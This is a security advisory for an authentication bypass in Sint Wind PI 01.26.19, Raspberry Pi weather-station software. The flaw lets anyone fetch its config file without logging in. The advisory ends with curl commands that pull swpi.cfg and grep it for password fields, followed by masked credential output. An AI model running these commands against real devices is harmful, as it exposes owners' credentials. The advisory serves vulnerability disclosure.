Sint Wind PI 01.26.19 Authentication Bypass

Sint Wind PI version 01.26.19 suffers from an authentication bypass vulnerability.

MD5 | 174e4d33a42654a568b034c9ff1fb36a

Sint Wind PI v01.26.19 Authentication Bypass

Vendor: Tonino Tarsi
Product web page:
Affected version: 01.26.19

Summary: A Meteo Station software for Raspberry PI. Capability include
telephone answering, webcams, digital cameras, web. A Sint Wind is a
wind condition (and other meteo data) telephone answering machine. This
implementation uses a Raspberry PI with an Huawei 3G dongle. The Sint
Wind is compatible with different kind of Meteo Sensors (WH1080, WH3080,
Davis, TX32, BMP085...).

Desc: Insecure Direct Object Reference flaw allows retrieval of configuration
file which contains authentication credentials to device and other nodes
associated with it. The web application does not check for an authenticated
session to access its resources allowing direct access to swpi.cfg (config file)
which contains credentials.

Tested on: SimpleHTTP/0.6 Python/2.7.3
Raspberry PI

Vulnerability discovered by Humberto Cabrera

Advisory ID: ZSL-2018-5472
Advisory URL:




curl http://target/swpi.cfg | grep -i pwd

smspwd = [*]
gmail_pwd = [*]
dnsexit_pwd = [*]

curl http://target/swpi.cfg | grep -i pass

ftpserverpassowd = [*]
weatherunderground_password = [*]
pws_password = XXXXXXXX
cwop_password = -1
windfinder_password = ******

Related Posts